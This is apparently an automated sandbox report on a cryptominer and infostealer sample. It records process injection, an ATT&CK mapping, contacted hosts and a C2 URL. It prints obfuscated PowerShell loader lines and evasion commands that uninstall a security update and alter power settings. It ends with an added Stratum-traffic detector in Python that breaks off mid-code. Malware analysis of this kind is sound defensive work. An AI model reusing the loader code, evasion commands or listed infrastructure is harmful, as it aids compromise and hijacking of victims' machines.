            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 970000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 670000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2970000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2300000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 840000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2090000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2200000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F0A6440000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1BFF06F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 24089940000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28B955D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 14ECB470000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 191C8F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 27F4ECC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 17B55CA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9700000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9730000
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:cktjhrwjgtvv{param([outputtype([type])][parameter(position=0)][type[]]$oberloaczjvocu,[parameter(position=1)][type]$nrddeuxitk)$iahamhduysn=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+'a'+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+'mor'+[char](121)+''+[char](77)+''+'o'+'dul'+'e'+'',$false).definetype(''+[char](77)+''+'y'+'de'+[char](108)+''+'e'+''+[char](103)+''+[char](97)+'t'+'e'+''+[char](84)+''+'y'+'p'+'e'+'',''+[char](67)+''+[char](108)+'as'+[char](115)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+'i'+'c,'+[char](83)+'e'+'a'+''+[char](108)+''+'e'+''+[char](100)+''+[char](44)+''+[char](65)+'nsic'+[char](108)+'a'+[char](115)+''+[char](115)+''+','+''+'a'+''+[char](117)+''+'t'+''+[char](111)+'cla'+'s'+''+'s'+'',[multicastdelegate]);$iahamhduysn.defineconstructor(''+'r'+''+'t'+''+[char](83)+''+'p'+''+[char](101)+'c'+[char](105)+'a'+[char](108)+''+[char](78)+'a'+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+'g'+[char](44)+'p'+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$oberloaczjvocu).setimplementationflags(''+'r'+'u'+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+[char](110)+''+[char](97)+'ged');$iahamhduysn.definemethod('i'+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+'ub'+'l'+''+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+'i'+''+'d'+''+'e'+''+[char](66)+''+'y'+''+'s'+''+[char](105)+''+[cha
r](103)+''+[char](44)+''+[char](78)+''+[char](101)+''+'w'+''+[char](83)+''+'l'+''+[char](111)+'t'+[char](44)+''+[char](86)+''+[char](105)+'r'+[char](116)+'u'+'a'+''+[char](108)+'',$nrddeuxitk,$oberloaczjvocu).setimplementationflags('ru'+[char](110)+''+[char](116)+''+[char](105)+''+'m'+'e'+','+''+[char](77)+'anag'+'e'+''+'d'+'');write-output $iahamhduysn.createtype();}$qragmiyqxnsdw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+'y'+''+'s'+'te'+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+''+[char](114)+'os'+[char](111)+'f'+'t'+''+[char](46)+''+[char](87)+''+'i'+'n3'+[char](50)+''+[char](46)+''+[char](85)+''+'n'+'s'+[char](97)+'f'+[char](101)+''+[char](78)+'a'+[char](116)+''+[char](105)+''+[char](118)+''+[char](101)+''+'m'+'e'+[char](116)+'ho'+[char](100)+''+'s'+'');$ovdfgatjnennnn=$qragmiyqxnsdw.getmethod(''+'g'+''+[char](101)+'t'+'p'+''+[char](114)+''+[char](111)+'c'+[char](65)+
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:dwpcgqraxeqb{param([outputtype([type])][parameter(position=0)][type[]]$kwrqxtwrdzvghi,[parameter(position=1)][type]$douozqbwki)$zycfoocruuh=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+''+[char](102)+''+'l'+''+[char](101)+''+[char](99)+''+[char](116)+''+[char](101)+'d'+'d'+''+[char](101)+'l'+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+''+[char](109)+'o'+[char](114)+'y'+'m'+'o'+[char](100)+'u'+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+[char](68)+'e'+[char](108)+''+'e'+'ga'+[char](116)+''+[char](101)+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+''+[char](115)+''+[char](44)+''+[char](80)+''+'u'+'b'+[char](108)+''+[char](105)+''+'c'+''+[char](44)+''+'s'+''+[char](101)+''+'a'+''+'l'+''+[char](101)+''+[char](100)+''+','+''+[char](65)+''+[char](110)+''+'s'+''+'i'+''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](65)+''+[char](117)+''+[char](116)+''+'o'+''+[char](67)+'lass',[multicastdelegate]);$zycfoocruuh.defineconstructor(''+[char](82)+'t'+[char](83)+''+'p'+'e'+'c'+''+[char](105)+''+[char](97)+''+'l'+''+'n'+''+[char](97)+''+[char](109)+''+[char](101)+','+[char](72)+''+'i'+'d'+[char](101)+'b'+[char](121)+''+'s'+''+[char](105)+''+[char](103)+','+[char](80)+'u'+'b'+'l'+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$kwrqxtwrdzvghi).setimplementationflags(''+'r'+''+'u'+'nt'+'i'+'m'+[char](101)+','+'m'+''+'a'+''+[char](110)+''+[char](97)+'g'+'e'+''+[char](100)+'');$zycfoocruuh.definemethod(''+[char](73)+'n'+[char](118)+''+'o'+''+'k'+''+'e'+'',''+[char](80)+''+[char](1
17)+''+'b'+''+[char](108)+''+[char](105)+'c'+[char](44)+'h'+[char](105)+''+[char](100)+''+[char](101)+''+'b'+''+[char](121)+'sig'+','+''+[char](78)+''+'e'+''+[char](119)+''+'s'+''+[char](108)+''+[char](111)+''+[char](116)+''+[char](44)+''+[char](86)+'ir'+[char](116)+''+'u'+''+'a'+''+[char](108)+'',$douozqbwki,$kwrqxtwrdzvghi).setimplementationflags(''+'r'+''+'u'+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+'n'+'a'+''+[char](103)+''+'e'+''+[char](100)+'');write-output $zycfoocruuh.createtype();}$pibnzpatgoisb=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+'t'+''+'e'+''+[char](109)+''+[char](46)+'d'+'l'+'l')}).gettype(''+[char](77)+'i'+[char](99)+''+[char](114)+'o'+'s'+''+'o'+''+[char](102)+''+[char](116)+'.'+[char](87)+'in'+[char](51)+''+[char](50)+''+'.'+'uns'+[char](97)+''+[char](102)+'e'+'n'+''+[char](97)+'t'+'i'+''+[char](118)+'em'+[char](101)+''+[char]
            Source: C:\Windows\System32\dllhost.exe Code function: 68_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,68_2_0000000140002300
            Source: C:\Windows\System32\conhost.exe Code function: 31_3_0000024089953B20 cpuid 31_3_0000024089953B20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\dllhost.exe Code function: 68_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,68_2_0000000140002300
            Source: C:\Windows\System32\conhost.exe Code function: 31_2_000002408A297D90 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,31_2_000002408A297D90
            Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\0Ty.png.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: dllhost.exe Binary or memory string: MsMpEng.exe
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 12 Native API | 11 Windows Service | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Scheduled Task/Job | 11 Windows Service | 11 Obfuscated Files or Information | Security Account Manager | 44 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | Login Hook | 712 Process Injection | 1 Install Root Certificate | NTDS | 351 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | 1 Service Execution | Network Logon Script | 1 Scheduled Task/Job | 1 Software Packing | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | 1 PowerShell | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 File Deletion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 4 Rootkit | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Masquerading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Modify Registry | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 141 Virtualization/Sandbox Evasion | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Access Token Manipulation | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
            Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 712 Process Injection | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
            Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | 1 Hidden Files and Directories | Web Portal Capture | Local Groups | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580691 Sample: 0Ty.png.exe Startdate: 25/12/2024 Architecture: WINDOWS Score: 100 70 monerooceans.stream 2->70 72 gulf.moneroocean.stream 2->72 74 bg.microsoft.map.fastly.net 2->74 80 Suricata IDS alerts for network traffic 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 18 other signatures 2->86 10 0Ty.png.exe 1 2 2->10         started        14 weiuemyrzjra.exe 1 2->14         started        16 powershell.exe 2 15 2->16         started        18 powershell.exe 2->18         started        signatures3 process4 file5 66 C:\ProgramData\...\weiuemyrzjra.exe, PE32+ 10->66 dropped 108 Self deletion via cmd or bat file 10->108 110 Uses powercfg.exe to modify the power settings 10->110 112 Modifies the context of a thread in another process (thread injection) 10->112 114 Modifies power options to not sleep / hibernate 10->114 20 dllhost.exe 10->20         started        23 powershell.exe 23 10->23         started        25 cmd.exe 1 10->25         started        36 15 other processes 10->36 68 C:\Windows\Temp\ihddniqxcjeb.sys, PE32+ 14->68 dropped 116 Multi AV Scanner detection for dropped file 14->116 118 Adds a directory exclusion to Windows Defender 14->118 120 Sample is not signed and drops a device driver 14->120 27 dialer.exe 14->27         started        30 powershell.exe 21 14->30         started        38 12 other processes 14->38 122 Writes to foreign memory regions 16->122 124 Injects a PE file into a foreign processes 16->124 32 conhost.exe 16->32         started        34 conhost.exe 18->34         started        signatures6 process7 dnsIp8 88 Contains functionality to inject code into remote processes 20->88 90 Writes to foreign memory regions 20->90 92 Creates a thread in another existing process (thread injection) 20->92 102 2 other signatures 20->102 40 winlogon.exe 20->40 injected 42 lsass.exe 20->42 injected 51 2 
other processes 20->51 94 Found suspicious powershell code related to unpacking or dynamic code loading 23->94 96 Loading BitLocker PowerShell Module 23->96 45 conhost.exe 23->45         started        53 2 other processes 25->53 76 monerooceans.stream 194.164.234.171, 10128, 49730 KCOM-SPNService-ProviderNetworkex-MistralGB United Kingdom 27->76 78 85.209.133.29, 49731, 49755, 49775 CMCSUS Germany 27->78 98 Query firmware table information (likely to detect VMs) 27->98 47 conhost.exe 30->47         started        49 conhost.exe 36->49         started        55 14 other processes 36->55 57 11 other processes 38->57 signatures9 100 Detected Stratum mining protocol 76->100 process10 signatures11 59 dllhost.exe 40->59         started        104 Installs new ROOT certificates 42->104 106 Writes to foreign memory regions 42->106 process12 signatures13 126 Injects code into the Windows Explorer (explorer.exe) 59->126 128 Writes to foreign memory regions 59->128 130 Creates a thread in another existing process (thread injection) 59->130 132 Injects a PE file into a foreign processes 59->132 62 svchost.exe 59->62 injected 64 svchost.exe 59->64 injected process14

            Source | Detection | Scanner | Label
            0Ty.png.exe | 65% | Virustotal |
            0Ty.png.exe | 66% | ReversingLabs | Win64.Infostealer.Tinba
            Source | Detection | Scanner | Label
            C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | 66% | ReversingLabs | Win64.Infostealer.Tinba
            C:\Windows\Temp\ihddniqxcjeb.sys | 5% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            http://85.209.133.29/lowkey/api/endpoint.php | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            bg.microsoft.map.fastly.net | 199.232.214.172 | true | false |  | high
            monerooceans.stream | 194.164.234.171 | true | false |  | high
            gulf.moneroocean.stream | unknown | unknown | false |  | high
            Name | Malicious | Antivirus Detection | Reputation
            http://85.209.133.29/lowkey/api/endpoint.php | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nuget.org/NuGet.exe | powershell.exe, 0000001C.00000002.1836172170.000001BF90219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            http://schemas.m | dialer.exe, 00000018.00000003.1719273538.0000027DD0413000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000018.00000002.1719637666.0000027DD0417000.00000004.00000020.00020000.00000000.sdmp | false |  | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://go.micro | powershell.exe, 0000001C.00000002.1767100204.000001BF81151000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://contoso.com/ | powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://nuget.org/nuget.exe | powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://contoso.com/License | powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://contoso.com/Icon | powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://aka.ms/pscore68 | powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://github.com/Pester/Pester | powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
IP | Domain | Country | ASN | ASN Name | Malicious
194.164.234.171 | monerooceans.stream | United Kingdom | 8897 | KCOM-SPNService-ProviderNetworkex-MistralGB | false
85.209.133.29 | unknown | Germany | 33657 | CMCSUS | true
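The table above lists the hosts the sample contacted, including monerooceans.stream, which the context table further down ties to several other Xmrig samples. Miners talk to such pools over Stratum, a newline-delimited JSON-RPC protocol, and that is what makes the traffic recognisable regardless of the pool's address. The following is an added example, not code from Joe Sandbox or from this report, of how to pick Stratum messages out of captured payload lines. It recognises both the XMRig/Monero dialect (login, job, submit, keepalived) and the classic mining.* dialect. The sample lines, the wallet string, the job id and the target value are constructed placeholders; nothing in them comes from this analysis.

```python
import json

# JSON-RPC method names used by the two common Stratum dialects:
# the XMRig / Monero pool dialect (login, job, submit, keepalived)
# and the classic Bitcoin-style dialect (mining.*).
STRATUM_METHODS = {
    "login", "job", "submit", "keepalived",
    "mining.subscribe", "mining.authorize", "mining.notify", "mining.submit",
}

# Keys that a Monero-style job payload always carries.
JOB_KEYS = {"blob", "job_id", "target"}


def classify_stratum_line(line):
    """Classify one newline-delimited payload line.

    Returns a dict describing the Stratum message, or None when the line
    is not JSON, not a JSON object, or not a recognisable Stratum message.
    """
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None

    method = msg.get("method")
    if method in STRATUM_METHODS:
        info = {"kind": "request", "method": method}
        params = msg.get("params")
        if method == "login" and isinstance(params, dict):
            # XMRig sends the wallet, a password/worker name, its agent
            # string and the algorithm list in the login request.
            info["wallet"] = params.get("login")
            info["agent"] = params.get("agent")
            info["algos"] = params.get("algo", [])
        return info

    result = msg.get("result")
    if isinstance(result, dict):
        # The login reply nests the first job under result.job; later jobs
        # arrive as {"method": "job", ...} and are caught by the branch above.
        job = result.get("job", result)
        if isinstance(job, dict) and JOB_KEYS <= set(job):
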